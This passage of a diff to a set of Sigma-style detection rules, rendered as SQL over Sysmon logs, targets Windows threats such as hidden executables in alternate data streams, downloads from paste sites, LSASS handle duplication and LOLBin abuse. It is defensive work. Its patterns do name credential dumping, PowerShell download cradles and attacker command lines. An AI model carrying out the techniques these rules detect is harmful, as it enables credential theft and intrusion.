'%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2019_1378.yml" + "filename": "create_stream_hash_hacktool_download.yml" }, { - "title": "Regasm/Regsvcs Suspicious Execution", - "id": "cc368ed0-2411-45dc-a222-510ace303cb2", + "title": "Creation Of a Suspicious ADS File Outside a Browser Download", + "id": "573df571-a223-43bc-846e-3f98da481eca", "status": "experimental", - "description": "Detects suspicious execution of Regasm/Regsvcs utilities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.009" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Other legitimate browsers not currently included in the filter (please add them)", + "Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')) OR (((Image LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\') OR ((CommandLine LIKE '%\\\\Regasm.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regasm.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe' ESCAPE '\\'))))))" + "SELECT * FROM logs WHERE ((EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Contents LIKE '[ZoneTransfer] ZoneId=3%' ESCAPE '\\' AND TargetFilename LIKE '%:Zone.Identifier' ESCAPE '\\' AND (TargetFilename LIKE '%.exe%' ESCAPE '\\' OR TargetFilename LIKE '%.scr%' ESCAPE '\\' OR TargetFilename LIKE '%.bat%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd%' ESCAPE '\\' OR TargetFilename LIKE '%.docx%' ESCAPE '\\' OR TargetFilename LIKE '%.hta%' ESCAPE '\\' OR TargetFilename LIKE '%.jse%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx%' ESCAPE '\\' OR TargetFilename LIKE '%.ps%' ESCAPE '\\' OR TargetFilename LIKE '%.reg%' ESCAPE '\\' OR TargetFilename LIKE '%.sct%' ESCAPE '\\' OR TargetFilename LIKE '%.vb%' ESCAPE '\\' OR TargetFilename LIKE '%.wsc%' ESCAPE '\\' OR TargetFilename LIKE '%.wsf%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\opera.exe' ESCAPE '\\') OR (Image LIKE '%\\\\safari.exe' ESCAPE '\\') OR (Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (Image LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_regasm.yml" + "filename": "create_stream_hash_creation_internet_file.yml" }, { - "title": "Suspect Svchost Activity", - "id": "16c37b52-b141-42a5-a3ea-bbe098444397", + "title": "Potential Suspicious Winget Package Installation", + "id": "a3f5c081-e75b-43a0-9f5b-51f26fe5dba2", "status": "experimental", - "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", - "author": "David Burkett, @signalblur", + "description": "Detects potential suspicious winget package installation from a suspicious source.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.persistence" ], "falsepositives": [ - "Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rpcnetp.exe' ESCAPE '\\') OR CommandLine = ''))" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Contents LIKE '[ZoneTransfer] ZoneId=3%' ESCAPE '\\' AND (Contents LIKE '%://1%' ESCAPE '\\' OR Contents LIKE '%://2%' ESCAPE '\\' OR Contents LIKE '%://3%' ESCAPE '\\' OR Contents LIKE '%://4%' ESCAPE '\\' OR Contents LIKE '%://5%' ESCAPE '\\' OR Contents LIKE '%://6%' ESCAPE '\\' OR Contents LIKE '%://7%' ESCAPE '\\' OR Contents LIKE '%://8%' ESCAPE '\\' OR Contents LIKE '%://9%' ESCAPE '\\') AND TargetFilename LIKE '%:Zone.Identifier' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_svchost_execution_with_no_cli_flags.yml" + "filename": "create_stream_hash_winget_susp_package_source.yml" }, { - "title": "PUA - Nimgrab Execution", - "id": "74a12f18-505c-4114-8d0b-8448dd5485c6", + "title": "Suspicious File Download From File Sharing Websites", + "id": "52182dfb-afb7-41db-b4bc-5336cb29b464", "status": "experimental", - "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.", - "author": "frack113", + "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ - "Legitimate use of Nim on a developer systems" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nimgrab.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45%' ESCAPE '\\') OR md5 = '2DD44C3C29D667F5C0EF5F9D7C7FFB8B' OR sha256 = 'F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559' OR Imphash = 'C07FDDD21D123EA9B3A08EEF44AAAC45'))" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Contents LIKE '%https://transfer.sh/%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cpl:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nimgrab.yml" + "filename": "create_stream_hash_file_sharing_domains_download_susp_extension.yml" }, { - "title": "PowerShell Web Download", - "id": "6e897651-f157-4d8f-aaeb-df8151488385", - "status": "experimental", - "description": "Detects suspicious ways to download files or content using PowerShell", - "author": "Florian Roth (Nextron Systems)", + "title": "Exports Registry Key To an Alternate Data Stream", + "id": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", + "status": "test", + "description": "Exports the target Registry key and hides it in the specified alternate data stream.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ], "falsepositives": [ - "Scripts or tools that download files" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regedit.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_download_cradles.yml" + "filename": "create_stream_hash_regedit_export_to_ads.yml" }, { - "title": "DLL Execution via Rasautou.exe", - "id": "cd3d1298-eb3b-476c-ac67-12847de55813", - "status": "test", - "description": "Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.", - "author": "Julia Fomina, oscd.community", + "title": "Unusual File Download From File Sharing Websites", + "id": "ae02ed70-11aa-4a22-b397-c0d0e8f6ea99", + "status": "experimental", + "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rasautou.exe' ESCAPE '\\' OR OriginalFileName = 'rasdlui.exe') AND (CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Contents LIKE '%transfer.sh%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_rasautou_dll_execution.yml" + "filename": "create_stream_hash_file_sharing_domains_download_unusual_extension.yml" }, { - "title": "Renamed MegaSync Execution", - "id": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", - "status": "test", - "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", - "author": "Sittikorn S", + "title": "Unusual File Download from Direct IP Address", + "id": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "status": "experimental", + "description": "Detects the download of suspicious file type from URLs with IP", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1564.004" ], "falsepositives": [ - "Software that illegally integrates MegaSync in a renamed form", - "Administrators that have renamed MegaSync" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'megasync.exe' AND NOT (Image LIKE '%\\\\megasync.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Contents REGEXP 'http[s]?://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}' AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_megasync.yml" + "filename": "create_stream_hash_susp_ip_domains.yml" }, { - "title": "Application Whitelisting Bypass via Bginfo", - "id": "aaf46cdc-934e-4284-b329-34aa701e3771", + "title": "Hidden Executable In NTFS Alternate Data Stream", + "id": "b69888d4-380c-45ce-9cf9-d9ce46e67821", "status": "test", - "description": "Execute VBscript code that is referenced within the *.bgi file.", - "author": "Beyu Denis, oscd.community", + "description": "Detects the creation of an ADS (Alternate Data Stream) that contains an executable (non-empty imphash)", + "author": "Florian Roth (Nextron Systems), @0xrawsec", "tags": [ - "attack.execution", - "attack.t1059.005", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\bginfo.exe' ESCAPE '\\' AND CommandLine LIKE '%/popup%' ESCAPE '\\' AND CommandLine LIKE '%/nolicprompt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Hash LIKE '%IMPHASH=%' ESCAPE '\\' AND NOT (Hash LIKE '%IMPHASH=00000000000000000000000000000000%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_bginfo.yml" + "filename": "create_stream_hash_ads_executable.yml" }, { - "title": "Suspicious Extrac32 Alternate Data Stream Execution", - "id": "4b13db67-0c45-40f1-aba8-66a1a7198a1e", - "status": "test", - "description": "Extract data from cab file and hide it in an alternate data stream", - "author": "frack113", + "title": "HandleKatz Duplicating LSASS Handle", + "id": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", + "status": "experimental", + "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", + "author": "Bhabesh Raj (rule), @thefLinkk", "tags": [ + "attack.execution", + "attack.t1106", "attack.defense_evasion", - "attack.t1564.004" + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%extrac32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND CommandLine REGEXP ':[^\\\\]')" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1440' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_extrac32_ads.yml" + "filename": "proc_access_win_handlekatz_lsass_access.yml" }, { - "title": "Turla Group Lateral Movement", - "id": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", - "status": "test", - "description": "Detects automated lateral movement by Turla group", - "author": "Markus Neis", + "title": "Direct Syscall of NtOpenProcess", + "id": "3f3f3506-1895-401b-9cc3-e86b16e630d0", + "status": "experimental", + "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", + "author": "Christian Burkard (Nextron Systems), Tim Shelton", "tags": [ - "attack.g0010", "attack.execution", - "attack.t1059", - "attack.lateral_movement", - "attack.t1021.002", - "attack.discovery", - "attack.t1083", - "attack.t1135" + "attack.t1106" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE 'net use \\\\\\\\\\%DomainController\\%\\\\C$ \"P@ssw0rd\" %' ESCAPE '\\' OR CommandLine LIKE 'dir c:\\\\%.doc% /s' ESCAPE '\\' OR CommandLine LIKE 'dir \\%TEMP\\%\\\\%.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CallTrace LIKE 'UNKNOWN%' ESCAPE '\\' AND NOT ((TargetImage LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceUI.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\' AND SourceImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\systeminfo.exe' ESCAPE '\\' AND SourceImage LIKE '%setup64.exe' ESCAPE '\\') OR (TargetImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\' AND SourceImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (TargetImage LIKE 